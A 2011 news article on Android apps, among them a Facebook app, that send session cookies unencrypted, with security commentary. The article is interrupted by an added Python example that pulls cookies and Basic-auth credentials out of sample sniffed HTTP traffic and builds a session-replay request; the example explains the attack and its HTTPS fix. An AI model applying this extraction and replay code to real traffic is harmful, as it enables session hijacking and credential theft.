
Google Android apps send credentials in the clear

01 March 2011

The Google Android smartphone platform has come under fire over a lack of security in certain apps, including an 'official' Facebook application that transmits users' session credentials, though not the password itself, in the clear.

This, says Dan Wallach, a computer science professor at Rice University in the US, means that anyone running a WiFi sniffer application can eavesdrop on the traffic and possibly intercept user sessions on a variety of web portals.

Wallach also asserts that this lack of security, which applies to everything except the password on Facebook, could allow a user's online session to be hijacked.
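To make the attack concrete, the following added example (not code from this article, from Wallach's work, or from any of the apps named) shows what a passive sniffer recovers from cleartext HTTP requests captured on a shared WiFi network: the parsed session cookies and any HTTP Basic credentials, plus the request an attacker would replay to take over the session without ever learning the password. The sample payloads, hostnames, cookie names and the `alice:hunter2` credential are all constructed for the example, and a TLS record is included to show that the same parser gets nothing from HTTPS traffic.

```python
import base64
from typing import Any, Dict, List, Optional

# Constructed sample traffic: the TCP payloads a passive Wi-Fi sniffer would see
# after reassembling the victim's packets. Hosts, paths, cookie names and the
# Basic-auth credentials are invented for this example.
_BASIC_TOKEN = base64.b64encode(b"alice:hunter2")  # b"YWxpY2U6aHVudGVyMg=="
# A TLS record: 5-byte record header followed by opaque (ciphertext-like) filler.
TLS_RECORD = b"\x16\x03\x03\x00\x40" + bytes(range(0x21, 0x61))

CAPTURED_PAYLOADS: List[bytes] = [
    # 1. App request carrying its session cookie over plain HTTP.
    b"GET /home.php HTTP/1.1\r\n"
    b"Host: m.example-social.test\r\n"
    b"Cookie: session_id=3f9c1e2a7b; user_pref=dark\r\n"
    b"User-Agent: ExampleApp/1.0 (Android)\r\n"
    b"\r\n",
    # 2. Portal API call authenticated with HTTP Basic over plain HTTP.
    b"GET /api/feed HTTP/1.1\r\nHost: api.example-portal.test\r\n"
    b"Authorization: Basic " + _BASIC_TOKEN + b"\r\n\r\n",
    # 3. The same kind of request sent over HTTPS: only ciphertext is visible.
    TLS_RECORD,
    # 4. A static asset fetch that carries nothing worth stealing.
    b"GET /logo.png HTTP/1.1\r\nHost: static.example-social.test\r\n\r\n",
]


def parse_http_request(raw: bytes) -> Optional[Dict[str, Any]]:
    """Split a cleartext HTTP/1.x request into method, target and headers.

    Returns None when the bytes are not an HTTP request (for example a TLS
    record), which is exactly what a sniffer sees when the app uses HTTPS.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            return None
        headers[name.strip().lower().decode("ascii", "replace")] = (
            value.strip().decode("ascii", "replace"))
    return {"method": parts[0].decode("ascii", "replace"),
            "target": parts[1].decode("ascii", "replace"),
            "headers": headers}


def extract_secrets(req: Dict[str, Any]) -> Dict[str, Any]:
    """Pull out everything an eavesdropper can reuse: cookies and Basic creds."""
    headers: Dict[str, str] = req["headers"]
    found: Dict[str, Any] = {"host": headers.get("host", ""),
                             "cookies": {}, "credentials": None}
    for pair in headers.get("cookie", "").split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep:
            found["cookies"][name] = value
    scheme, _, token = headers.get("authorization", "").partition(" ")
    if scheme.lower() == "basic" and token:
        try:
            user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
            found["credentials"] = (user, password)
        except (ValueError, UnicodeDecodeError):
            pass  # malformed token: nothing usable
    return found


def forge_replay(found: Dict[str, Any], target: str = "/home.php") -> bytes:
    """Build the request an attacker replays to ride the victim's session.

    No password is needed: the stolen cookie alone authenticates the request,
    which is why a leaked session cookie is as damaging as a leaked login.
    """
    cookie = "; ".join(f"{k}={v}" for k, v in found["cookies"].items())
    return (f"GET {target} HTTP/1.1\r\nHost: {found['host']}\r\n"
            f"Cookie: {cookie}\r\n\r\n").encode("ascii")


def sniff(payloads: List[bytes]) -> List[Dict[str, Any]]:
    """Run each captured payload through the parser; keep the ones that leaked."""
    findings = []
    for raw in payloads:
        req = parse_http_request(raw)
        if req is None:
            continue  # HTTPS traffic: nothing the sniffer can read
        found = extract_secrets(req)
        if found["cookies"] or found["credentials"]:
            findings.append(found)
    return findings


if __name__ == "__main__":
    for f in sniff(CAPTURED_PAYLOADS):
        print(f"{f['host']}: cookies={f['cookies']} credentials={f['credentials']}")
```

The parser gives up on the TLS record because everything after the record header is ciphertext, and that is the whole of the fix: an app that sends its session cookie only over https:// (and a server that marks the cookie Secure so it is never sent over plain http://) leaves the sniffer with nothing to replay.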

According to Phil Lieberman, CEO of Lieberman Software, the professor's discovery is typical of open source software, as there is little incentive for the software developer to use secure protocols unless the destination system requires it.

And this, he explained, is the biggest issue with open source software.

"Whilst the economic imperative to go open source is clearly very strong, companies that use open source, such as Android, which is based on Linux code, also need to ensure their software is robust on the security front, and this process costs money", he explained.

Lieberman, whose company specialises in privileged identity management and security solutions, went on to say that Android apps are an interesting case as, unlike most open source software, the apps are usually designed to run on an as-is basis, so adding security on the IP transmission side is not always an easy task.

"I would go one step further and state that this disclosure is but one early warning shot about the use of cloud computing and new platforms such as Android and Windows Mobile 7", he said.

"The other element is the stark reality that computer science graduates rarely, if ever, receive any training on how to write secure applications. So it should come as no surprise that many applications created by these same people are insecure", he added.

Lieberman went on to say that, depending on the platform provided by a vendor, the core security available to the developer can also be woefully inadequate.

"As a consequence, developers of applications frequently find themselves needing to add layer upon layer of additional technology which may be beyond their expertise and budget", he said.

"Because security is frequently an 'out of sight, out of mind' problem, it does not get addressed/funded until someone complains or something bad happens", he added.

Lieberman concludes that Wallach’s findings are a great lesson that it is time for developers to hit the books on how to secure their applications.

"Platform vendors need to complete their security and encryption suites to make it easy for developers to write secure applications", he said.
